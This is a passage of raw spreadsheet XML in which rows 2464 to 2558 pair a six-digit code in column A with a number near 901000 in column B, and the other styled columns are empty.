        <v>901070.00399999996</v>
      </c>
      <c r="D2464" s="5"/>
      <c r="E2464" s="3"/>
      <c r="F2464" s="1"/>
      <c r="H2464" s="1"/>
    </row>
    <row r="2465" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2465" s="5">
        <v>700168</v>
      </c>
      <c r="B2465" s="3">
        <v>901070.00600000005</v>
      </c>
      <c r="D2465" s="5"/>
      <c r="E2465" s="3"/>
      <c r="F2465" s="1"/>
      <c r="H2465" s="1"/>
    </row>
    <row r="2466" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2466" s="5">
        <v>700168</v>
      </c>
      <c r="B2466" s="3">
        <v>901105</v>
      </c>
      <c r="D2466" s="5"/>
      <c r="E2466" s="3"/>
      <c r="F2466" s="1"/>
      <c r="H2466" s="1"/>
    </row>
    <row r="2467" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2467" s="5">
        <v>700168</v>
      </c>
      <c r="B2467" s="3">
        <v>901027</v>
      </c>
      <c r="D2467" s="5"/>
      <c r="E2467" s="3"/>
      <c r="F2467" s="1"/>
      <c r="H2467" s="1"/>
    </row>
    <row r="2468" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2468" s="5">
        <v>700168</v>
      </c>
      <c r="B2468" s="3">
        <v>901055</v>
      </c>
      <c r="D2468" s="5"/>
      <c r="E2468" s="3"/>
      <c r="F2468" s="1"/>
      <c r="H2468" s="1"/>
    </row>
    <row r="2469" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2469" s="5">
        <v>700168</v>
      </c>
      <c r="B2469" s="3">
        <v>901055.00300000003</v>
      </c>
      <c r="D2469" s="5"/>
      <c r="E2469" s="3"/>
      <c r="F2469" s="1"/>
      <c r="H2469" s="1"/>
    </row>
    <row r="2470" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2470" s="5">
        <v>700168</v>
      </c>
      <c r="B2470" s="3">
        <v>901053.005</v>
      </c>
      <c r="D2470" s="5"/>
      <c r="E2470" s="3"/>
      <c r="F2470" s="1"/>
      <c r="H2470" s="1"/>
    </row>
    <row r="2471" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2471" s="5">
        <v>700168</v>
      </c>
      <c r="B2471" s="3">
        <v>901553.00199999998</v>
      </c>
      <c r="D2471" s="5"/>
      <c r="E2471" s="3"/>
      <c r="F2471" s="1"/>
      <c r="H2471" s="1"/>
    </row>
    <row r="2472" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2472" s="5">
        <v>700168</v>
      </c>
      <c r="B2472" s="3">
        <v>901033</v>
      </c>
      <c r="D2472" s="5"/>
      <c r="E2472" s="3"/>
      <c r="F2472" s="1"/>
      <c r="H2472" s="1"/>
    </row>
    <row r="2473" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2473" s="5">
        <v>700049</v>
      </c>
      <c r="B2473" s="3">
        <v>901087.00100000005</v>
      </c>
      <c r="D2473" s="5"/>
      <c r="E2473" s="3"/>
      <c r="F2473" s="1"/>
      <c r="H2473" s="1"/>
    </row>
    <row r="2474" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2474" s="5">
        <v>700049</v>
      </c>
      <c r="B2474" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D2474" s="5"/>
      <c r="E2474" s="3"/>
      <c r="F2474" s="1"/>
      <c r="H2474" s="1"/>
    </row>
    <row r="2475" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2475" s="5">
        <v>700049</v>
      </c>
      <c r="B2475" s="3">
        <v>901083</v>
      </c>
      <c r="D2475" s="5"/>
      <c r="E2475" s="3"/>
      <c r="F2475" s="1"/>
      <c r="H2475" s="1"/>
    </row>
    <row r="2476" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2476" s="5">
        <v>700049</v>
      </c>
      <c r="B2476" s="3">
        <v>901057</v>
      </c>
      <c r="D2476" s="5"/>
      <c r="E2476" s="3"/>
      <c r="F2476" s="1"/>
      <c r="H2476" s="1"/>
    </row>
    <row r="2477" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2477" s="5">
        <v>700049</v>
      </c>
      <c r="B2477" s="3">
        <v>901016</v>
      </c>
      <c r="D2477" s="5"/>
      <c r="E2477" s="3"/>
      <c r="F2477" s="1"/>
      <c r="H2477" s="1"/>
    </row>
    <row r="2478" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2478" s="5">
        <v>700049</v>
      </c>
      <c r="B2478" s="3">
        <v>901007</v>
      </c>
      <c r="D2478" s="5"/>
      <c r="E2478" s="3"/>
      <c r="F2478" s="1"/>
      <c r="H2478" s="1"/>
    </row>
    <row r="2479" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2479" s="5">
        <v>700460</v>
      </c>
      <c r="B2479" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D2479" s="5"/>
      <c r="E2479" s="3"/>
      <c r="F2479" s="1"/>
      <c r="H2479" s="1"/>
    </row>
    <row r="2480" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2480" s="5">
        <v>700460</v>
      </c>
      <c r="B2480" s="3">
        <v>901059</v>
      </c>
      <c r="D2480" s="5"/>
      <c r="E2480" s="3"/>
      <c r="F2480" s="1"/>
      <c r="H2480" s="1"/>
    </row>
    <row r="2481" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2481" s="5">
        <v>700460</v>
      </c>
      <c r="B2481" s="3">
        <v>901057</v>
      </c>
      <c r="D2481" s="5"/>
      <c r="E2481" s="3"/>
      <c r="F2481" s="1"/>
      <c r="H2481" s="1"/>
    </row>
    <row r="2482" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2482" s="5">
        <v>700460</v>
      </c>
      <c r="B2482" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D2482" s="5"/>
      <c r="E2482" s="3"/>
      <c r="F2482" s="1"/>
      <c r="H2482" s="1"/>
    </row>
    <row r="2483" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2483" s="5">
        <v>700460</v>
      </c>
      <c r="B2483" s="3">
        <v>901082</v>
      </c>
      <c r="D2483" s="5"/>
      <c r="E2483" s="3"/>
      <c r="F2483" s="1"/>
      <c r="H2483" s="1"/>
    </row>
    <row r="2484" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2484" s="5">
        <v>700460</v>
      </c>
      <c r="B2484" s="3">
        <v>901033</v>
      </c>
      <c r="D2484" s="5"/>
      <c r="E2484" s="3"/>
      <c r="F2484" s="1"/>
      <c r="H2484" s="1"/>
    </row>
    <row r="2485" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2485" s="5">
        <v>700032</v>
      </c>
      <c r="B2485" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D2485" s="5"/>
      <c r="E2485" s="3"/>
      <c r="F2485" s="1"/>
      <c r="H2485" s="1"/>
    </row>
    <row r="2486" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2486" s="5">
        <v>700032</v>
      </c>
      <c r="B2486" s="3">
        <v>901059</v>
      </c>
      <c r="D2486" s="5"/>
      <c r="E2486" s="3"/>
      <c r="F2486" s="1"/>
      <c r="H2486" s="1"/>
    </row>
    <row r="2487" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2487" s="5">
        <v>700032</v>
      </c>
      <c r="B2487" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D2487" s="5"/>
      <c r="E2487" s="3"/>
      <c r="F2487" s="1"/>
      <c r="H2487" s="1"/>
    </row>
    <row r="2488" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2488" s="5">
        <v>700032</v>
      </c>
      <c r="B2488" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D2488" s="5"/>
      <c r="E2488" s="3"/>
      <c r="F2488" s="1"/>
      <c r="H2488" s="1"/>
    </row>
    <row r="2489" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2489" s="5">
        <v>700032</v>
      </c>
      <c r="B2489" s="3">
        <v>901140</v>
      </c>
      <c r="D2489" s="5"/>
      <c r="E2489" s="3"/>
      <c r="F2489" s="1"/>
      <c r="H2489" s="1"/>
    </row>
    <row r="2490" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2490" s="5">
        <v>700032</v>
      </c>
      <c r="B2490" s="3">
        <v>901568.00100000005</v>
      </c>
      <c r="D2490" s="5"/>
      <c r="E2490" s="3"/>
      <c r="F2490" s="1"/>
      <c r="H2490" s="1"/>
    </row>
    <row r="2491" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2491" s="5">
        <v>700032</v>
      </c>
      <c r="B2491" s="3">
        <v>901573</v>
      </c>
      <c r="D2491" s="5"/>
      <c r="E2491" s="3"/>
      <c r="F2491" s="1"/>
      <c r="H2491" s="1"/>
    </row>
    <row r="2492" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2492" s="5">
        <v>700032</v>
      </c>
      <c r="B2492" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D2492" s="5"/>
      <c r="E2492" s="3"/>
      <c r="F2492" s="1"/>
      <c r="H2492" s="1"/>
    </row>
    <row r="2493" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2493" s="5">
        <v>700032</v>
      </c>
      <c r="B2493" s="3">
        <v>901574.00199999998</v>
      </c>
      <c r="D2493" s="5"/>
      <c r="E2493" s="3"/>
      <c r="F2493" s="1"/>
      <c r="H2493" s="1"/>
    </row>
    <row r="2494" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2494" s="5">
        <v>700032</v>
      </c>
      <c r="B2494" s="3">
        <v>901070.00100000005</v>
      </c>
      <c r="D2494" s="5"/>
      <c r="E2494" s="3"/>
      <c r="F2494" s="1"/>
      <c r="H2494" s="1"/>
    </row>
    <row r="2495" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2495" s="5">
        <v>700032</v>
      </c>
      <c r="B2495" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D2495" s="5"/>
      <c r="E2495" s="3"/>
      <c r="F2495" s="1"/>
      <c r="H2495" s="1"/>
    </row>
    <row r="2496" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2496" s="5">
        <v>700032</v>
      </c>
      <c r="B2496" s="3">
        <v>901105</v>
      </c>
      <c r="D2496" s="5"/>
      <c r="E2496" s="3"/>
      <c r="F2496" s="1"/>
      <c r="H2496" s="1"/>
    </row>
    <row r="2497" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2497" s="5">
        <v>700032</v>
      </c>
      <c r="B2497" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D2497" s="5"/>
      <c r="E2497" s="3"/>
      <c r="F2497" s="1"/>
      <c r="H2497" s="1"/>
    </row>
    <row r="2498" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2498" s="5">
        <v>700032</v>
      </c>
      <c r="B2498" s="3">
        <v>901112</v>
      </c>
      <c r="D2498" s="5"/>
      <c r="E2498" s="3"/>
      <c r="F2498" s="1"/>
      <c r="H2498" s="1"/>
    </row>
    <row r="2499" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2499" s="5">
        <v>700032</v>
      </c>
      <c r="B2499" s="3">
        <v>901106</v>
      </c>
      <c r="D2499" s="5"/>
      <c r="E2499" s="3"/>
      <c r="F2499" s="1"/>
      <c r="H2499" s="1"/>
    </row>
    <row r="2500" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2500" s="5">
        <v>700032</v>
      </c>
      <c r="B2500" s="3">
        <v>901095</v>
      </c>
      <c r="D2500" s="5"/>
      <c r="E2500" s="3"/>
      <c r="F2500" s="1"/>
      <c r="H2500" s="1"/>
    </row>
    <row r="2501" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2501" s="5">
        <v>700032</v>
      </c>
      <c r="B2501" s="3">
        <v>901057</v>
      </c>
      <c r="D2501" s="5"/>
      <c r="E2501" s="3"/>
      <c r="F2501" s="1"/>
      <c r="H2501" s="1"/>
    </row>
    <row r="2502" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2502" s="5">
        <v>700032</v>
      </c>
      <c r="B2502" s="3">
        <v>901055</v>
      </c>
      <c r="D2502" s="5"/>
      <c r="E2502" s="3"/>
      <c r="F2502" s="1"/>
      <c r="H2502" s="1"/>
    </row>
    <row r="2503" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2503" s="5">
        <v>700032</v>
      </c>
      <c r="B2503" s="3">
        <v>901012</v>
      </c>
      <c r="D2503" s="5"/>
      <c r="E2503" s="3"/>
      <c r="F2503" s="1"/>
      <c r="H2503" s="1"/>
    </row>
    <row r="2504" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2504" s="5">
        <v>700032</v>
      </c>
      <c r="B2504" s="3">
        <v>901113</v>
      </c>
      <c r="D2504" s="5"/>
      <c r="E2504" s="3"/>
      <c r="F2504" s="1"/>
      <c r="H2504" s="1"/>
    </row>
    <row r="2505" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2505" s="5">
        <v>700032</v>
      </c>
      <c r="B2505" s="3">
        <v>901129</v>
      </c>
      <c r="D2505" s="5"/>
      <c r="E2505" s="3"/>
      <c r="F2505" s="1"/>
      <c r="H2505" s="1"/>
    </row>
    <row r="2506" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2506" s="5">
        <v>700032</v>
      </c>
      <c r="B2506" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D2506" s="5"/>
      <c r="E2506" s="3"/>
      <c r="F2506" s="1"/>
      <c r="H2506" s="1"/>
    </row>
    <row r="2507" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2507" s="5">
        <v>700032</v>
      </c>
      <c r="B2507" s="3">
        <v>901082</v>
      </c>
      <c r="D2507" s="5"/>
      <c r="E2507" s="3"/>
      <c r="F2507" s="1"/>
      <c r="H2507" s="1"/>
    </row>
    <row r="2508" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2508" s="5">
        <v>700032</v>
      </c>
      <c r="B2508" s="3">
        <v>901569.00199999998</v>
      </c>
      <c r="D2508" s="5"/>
      <c r="E2508" s="3"/>
      <c r="F2508" s="1"/>
      <c r="H2508" s="1"/>
    </row>
    <row r="2509" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2509" s="5">
        <v>700423</v>
      </c>
      <c r="B2509" s="3">
        <v>901432</v>
      </c>
      <c r="D2509" s="5"/>
      <c r="E2509" s="3"/>
      <c r="F2509" s="1"/>
      <c r="H2509" s="1"/>
    </row>
    <row r="2510" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2510" s="5">
        <v>700423</v>
      </c>
      <c r="B2510" s="3">
        <v>901413</v>
      </c>
      <c r="D2510" s="5"/>
      <c r="E2510" s="3"/>
      <c r="F2510" s="1"/>
      <c r="H2510" s="1"/>
    </row>
    <row r="2511" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2511" s="5">
        <v>700423</v>
      </c>
      <c r="B2511" s="3">
        <v>901418</v>
      </c>
      <c r="D2511" s="5"/>
      <c r="E2511" s="3"/>
      <c r="F2511" s="1"/>
      <c r="H2511" s="1"/>
    </row>
    <row r="2512" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2512" s="5">
        <v>700423</v>
      </c>
      <c r="B2512" s="3">
        <v>901412</v>
      </c>
      <c r="D2512" s="5"/>
      <c r="E2512" s="3"/>
      <c r="F2512" s="1"/>
      <c r="H2512" s="1"/>
    </row>
    <row r="2513" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2513" s="5">
        <v>700423</v>
      </c>
      <c r="B2513" s="3">
        <v>901533</v>
      </c>
      <c r="D2513" s="5"/>
      <c r="E2513" s="3"/>
      <c r="F2513" s="1"/>
      <c r="H2513" s="1"/>
    </row>
    <row r="2514" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2514" s="5">
        <v>700423</v>
      </c>
      <c r="B2514" s="3">
        <v>901523</v>
      </c>
      <c r="D2514" s="5"/>
      <c r="E2514" s="3"/>
      <c r="F2514" s="1"/>
      <c r="H2514" s="1"/>
    </row>
    <row r="2515" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2515" s="5">
        <v>700423</v>
      </c>
      <c r="B2515" s="3">
        <v>901516</v>
      </c>
      <c r="D2515" s="5"/>
      <c r="E2515" s="3"/>
      <c r="F2515" s="1"/>
      <c r="H2515" s="1"/>
    </row>
    <row r="2516" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2516" s="5">
        <v>700423</v>
      </c>
      <c r="B2516" s="3">
        <v>901411</v>
      </c>
      <c r="D2516" s="5"/>
      <c r="E2516" s="3"/>
      <c r="F2516" s="1"/>
      <c r="H2516" s="1"/>
    </row>
    <row r="2517" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2517" s="5">
        <v>700423</v>
      </c>
      <c r="B2517" s="3">
        <v>901444</v>
      </c>
      <c r="D2517" s="5"/>
      <c r="E2517" s="3"/>
      <c r="F2517" s="1"/>
      <c r="H2517" s="1"/>
    </row>
    <row r="2518" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2518" s="5">
        <v>700423</v>
      </c>
      <c r="B2518" s="3">
        <v>901406</v>
      </c>
      <c r="D2518" s="5"/>
      <c r="E2518" s="3"/>
      <c r="F2518" s="1"/>
      <c r="H2518" s="1"/>
    </row>
    <row r="2519" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2519" s="5">
        <v>700423</v>
      </c>
      <c r="B2519" s="3">
        <v>901513</v>
      </c>
      <c r="D2519" s="5"/>
      <c r="E2519" s="3"/>
      <c r="F2519" s="1"/>
      <c r="H2519" s="1"/>
    </row>
    <row r="2520" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2520" s="5">
        <v>700423</v>
      </c>
      <c r="B2520" s="3">
        <v>901582</v>
      </c>
      <c r="D2520" s="5"/>
      <c r="E2520" s="3"/>
      <c r="F2520" s="1"/>
      <c r="H2520" s="1"/>
    </row>
    <row r="2521" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2521" s="5">
        <v>700423</v>
      </c>
      <c r="B2521" s="3">
        <v>901508</v>
      </c>
      <c r="D2521" s="5"/>
      <c r="E2521" s="3"/>
      <c r="F2521" s="1"/>
      <c r="H2521" s="1"/>
    </row>
    <row r="2522" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2522" s="5">
        <v>700026</v>
      </c>
      <c r="B2522" s="3">
        <v>901102.00199999998</v>
      </c>
      <c r="D2522" s="5"/>
      <c r="E2522" s="3"/>
      <c r="F2522" s="1"/>
      <c r="H2522" s="1"/>
    </row>
    <row r="2523" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2523" s="5">
        <v>700249</v>
      </c>
      <c r="B2523" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D2523" s="5"/>
      <c r="E2523" s="3"/>
      <c r="F2523" s="1"/>
      <c r="H2523" s="1"/>
    </row>
    <row r="2524" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2524" s="5">
        <v>700249</v>
      </c>
      <c r="B2524" s="3">
        <v>901560</v>
      </c>
      <c r="D2524" s="5"/>
      <c r="E2524" s="3"/>
      <c r="F2524" s="1"/>
      <c r="H2524" s="1"/>
    </row>
    <row r="2525" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2525" s="5">
        <v>700249</v>
      </c>
      <c r="B2525" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D2525" s="5"/>
      <c r="E2525" s="3"/>
      <c r="F2525" s="1"/>
      <c r="H2525" s="1"/>
    </row>
    <row r="2526" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2526" s="5">
        <v>700249</v>
      </c>
      <c r="B2526" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D2526" s="5"/>
      <c r="E2526" s="3"/>
      <c r="F2526" s="1"/>
      <c r="H2526" s="1"/>
    </row>
    <row r="2527" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2527" s="5">
        <v>700249</v>
      </c>
      <c r="B2527" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D2527" s="5"/>
      <c r="E2527" s="3"/>
      <c r="F2527" s="1"/>
      <c r="H2527" s="1"/>
    </row>
    <row r="2528" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2528" s="5">
        <v>700249</v>
      </c>
      <c r="B2528" s="3">
        <v>901083</v>
      </c>
      <c r="D2528" s="5"/>
      <c r="E2528" s="3"/>
      <c r="F2528" s="1"/>
      <c r="H2528" s="1"/>
    </row>
    <row r="2529" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2529" s="5">
        <v>700249</v>
      </c>
      <c r="B2529" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D2529" s="5"/>
      <c r="E2529" s="3"/>
      <c r="F2529" s="1"/>
      <c r="H2529" s="1"/>
    </row>
    <row r="2530" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2530" s="5">
        <v>700249</v>
      </c>
      <c r="B2530" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D2530" s="5"/>
      <c r="E2530" s="3"/>
      <c r="F2530" s="1"/>
      <c r="H2530" s="1"/>
    </row>
    <row r="2531" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2531" s="5">
        <v>700249</v>
      </c>
      <c r="B2531" s="3">
        <v>901105</v>
      </c>
      <c r="D2531" s="5"/>
      <c r="E2531" s="3"/>
      <c r="F2531" s="1"/>
      <c r="H2531" s="1"/>
    </row>
    <row r="2532" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2532" s="5">
        <v>700249</v>
      </c>
      <c r="B2532" s="3">
        <v>901057</v>
      </c>
      <c r="D2532" s="5"/>
      <c r="E2532" s="3"/>
      <c r="F2532" s="1"/>
      <c r="H2532" s="1"/>
    </row>
    <row r="2533" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2533" s="5">
        <v>700249</v>
      </c>
      <c r="B2533" s="3">
        <v>901012</v>
      </c>
      <c r="D2533" s="5"/>
      <c r="E2533" s="3"/>
      <c r="F2533" s="1"/>
      <c r="H2533" s="1"/>
    </row>
    <row r="2534" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2534" s="5">
        <v>700249</v>
      </c>
      <c r="B2534" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D2534" s="5"/>
      <c r="E2534" s="3"/>
      <c r="F2534" s="1"/>
      <c r="H2534" s="1"/>
    </row>
    <row r="2535" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2535" s="5">
        <v>700249</v>
      </c>
      <c r="B2535" s="3">
        <v>901082</v>
      </c>
      <c r="D2535" s="5"/>
      <c r="E2535" s="3"/>
      <c r="F2535" s="1"/>
      <c r="H2535" s="1"/>
    </row>
    <row r="2536" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2536" s="5">
        <v>700249</v>
      </c>
      <c r="B2536" s="3">
        <v>901033</v>
      </c>
      <c r="D2536" s="5"/>
      <c r="E2536" s="3"/>
      <c r="F2536" s="1"/>
      <c r="H2536" s="1"/>
    </row>
    <row r="2537" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2537" s="5">
        <v>700535</v>
      </c>
      <c r="B2537" s="3">
        <v>901432</v>
      </c>
      <c r="D2537" s="5"/>
      <c r="E2537" s="3"/>
      <c r="F2537" s="1"/>
      <c r="H2537" s="1"/>
    </row>
    <row r="2538" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2538" s="5">
        <v>700535</v>
      </c>
      <c r="B2538" s="3">
        <v>901418</v>
      </c>
      <c r="D2538" s="5"/>
      <c r="E2538" s="3"/>
      <c r="F2538" s="1"/>
      <c r="H2538" s="1"/>
    </row>
    <row r="2539" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2539" s="5">
        <v>700535</v>
      </c>
      <c r="B2539" s="3">
        <v>901429</v>
      </c>
      <c r="D2539" s="5"/>
      <c r="E2539" s="3"/>
      <c r="F2539" s="1"/>
      <c r="H2539" s="1"/>
    </row>
    <row r="2540" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2540" s="5">
        <v>700535</v>
      </c>
      <c r="B2540" s="3">
        <v>901512</v>
      </c>
      <c r="D2540" s="5"/>
      <c r="E2540" s="3"/>
      <c r="F2540" s="1"/>
      <c r="H2540" s="1"/>
    </row>
    <row r="2541" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2541" s="5">
        <v>700535</v>
      </c>
      <c r="B2541" s="3">
        <v>901412</v>
      </c>
      <c r="D2541" s="5"/>
      <c r="E2541" s="3"/>
      <c r="F2541" s="1"/>
      <c r="H2541" s="1"/>
    </row>
    <row r="2542" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2542" s="5">
        <v>700535</v>
      </c>
      <c r="B2542" s="3">
        <v>901532</v>
      </c>
      <c r="D2542" s="5"/>
      <c r="E2542" s="3"/>
      <c r="F2542" s="1"/>
      <c r="H2542" s="1"/>
    </row>
    <row r="2543" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2543" s="5">
        <v>700535</v>
      </c>
      <c r="B2543" s="3">
        <v>901533</v>
      </c>
      <c r="D2543" s="5"/>
      <c r="E2543" s="3"/>
      <c r="F2543" s="1"/>
      <c r="H2543" s="1"/>
    </row>
    <row r="2544" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2544" s="5">
        <v>700535</v>
      </c>
      <c r="B2544" s="3">
        <v>901475</v>
      </c>
      <c r="D2544" s="5"/>
      <c r="E2544" s="3"/>
      <c r="F2544" s="1"/>
      <c r="H2544" s="1"/>
    </row>
    <row r="2545" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2545" s="5">
        <v>700535</v>
      </c>
      <c r="B2545" s="3">
        <v>901407</v>
      </c>
      <c r="D2545" s="5"/>
      <c r="E2545" s="3"/>
      <c r="F2545" s="1"/>
      <c r="H2545" s="1"/>
    </row>
    <row r="2546" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2546" s="5">
        <v>700535</v>
      </c>
      <c r="B2546" s="3">
        <v>901420</v>
      </c>
      <c r="D2546" s="5"/>
      <c r="E2546" s="3"/>
      <c r="F2546" s="1"/>
      <c r="H2546" s="1"/>
    </row>
    <row r="2547" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2547" s="5">
        <v>700535</v>
      </c>
      <c r="B2547" s="3">
        <v>901430</v>
      </c>
      <c r="D2547" s="5"/>
      <c r="E2547" s="3"/>
      <c r="F2547" s="1"/>
      <c r="H2547" s="1"/>
    </row>
    <row r="2548" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2548" s="5">
        <v>700535</v>
      </c>
      <c r="B2548" s="3">
        <v>901437</v>
      </c>
      <c r="D2548" s="5"/>
      <c r="E2548" s="3"/>
      <c r="F2548" s="1"/>
      <c r="H2548" s="1"/>
    </row>
    <row r="2549" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2549" s="5">
        <v>700535</v>
      </c>
      <c r="B2549" s="3">
        <v>901426</v>
      </c>
      <c r="D2549" s="5"/>
      <c r="E2549" s="3"/>
      <c r="F2549" s="1"/>
      <c r="H2549" s="1"/>
    </row>
    <row r="2550" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2550" s="5">
        <v>700535</v>
      </c>
      <c r="B2550" s="3">
        <v>901422</v>
      </c>
      <c r="D2550" s="5"/>
      <c r="E2550" s="3"/>
      <c r="F2550" s="1"/>
      <c r="H2550" s="1"/>
    </row>
    <row r="2551" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2551" s="5">
        <v>700551</v>
      </c>
      <c r="B2551" s="3">
        <v>901433</v>
      </c>
      <c r="D2551" s="5"/>
      <c r="E2551" s="3"/>
      <c r="F2551" s="1"/>
      <c r="H2551" s="1"/>
    </row>
    <row r="2552" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2552" s="5">
        <v>700551</v>
      </c>
      <c r="B2552" s="3">
        <v>901432</v>
      </c>
      <c r="D2552" s="5"/>
      <c r="E2552" s="3"/>
      <c r="F2552" s="1"/>
      <c r="H2552" s="1"/>
    </row>
    <row r="2553" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2553" s="5">
        <v>700551</v>
      </c>
      <c r="B2553" s="3">
        <v>901409</v>
      </c>
      <c r="D2553" s="5"/>
      <c r="E2553" s="3"/>
      <c r="F2553" s="1"/>
      <c r="H2553" s="1"/>
    </row>
    <row r="2554" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2554" s="5">
        <v>700551</v>
      </c>
      <c r="B2554" s="3">
        <v>901418</v>
      </c>
      <c r="D2554" s="5"/>
      <c r="E2554" s="3"/>
      <c r="F2554" s="1"/>
      <c r="H2554" s="1"/>
    </row>
    <row r="2555" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2555" s="5">
        <v>700551</v>
      </c>
      <c r="B2555" s="3">
        <v>901429</v>
      </c>
      <c r="D2555" s="5"/>
      <c r="E2555" s="3"/>
      <c r="F2555" s="1"/>
      <c r="H2555" s="1"/>
    </row>
    <row r="2556" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2556" s="5">
        <v>700551</v>
      </c>
      <c r="B2556" s="3">
        <v>901512</v>
      </c>
      <c r="D2556" s="5"/>
      <c r="E2556" s="3"/>
      <c r="F2556" s="1"/>
      <c r="H2556" s="1"/>
    </row>
    <row r="2557" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2557" s="5">
        <v>700551</v>
      </c>
      <c r="B2557" s="3">
        <v>901412</v>
      </c>
      <c r="D2557" s="5"/>
      <c r="E2557" s="3"/>
      <c r="F2557" s="1"/>
      <c r="H2557" s="1"/>
    </row>
    <row r="2558" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2558" s="5">
        <v>700551</v>
      </c>
      <c r="B2558" s="3">
        <v>901533</v>
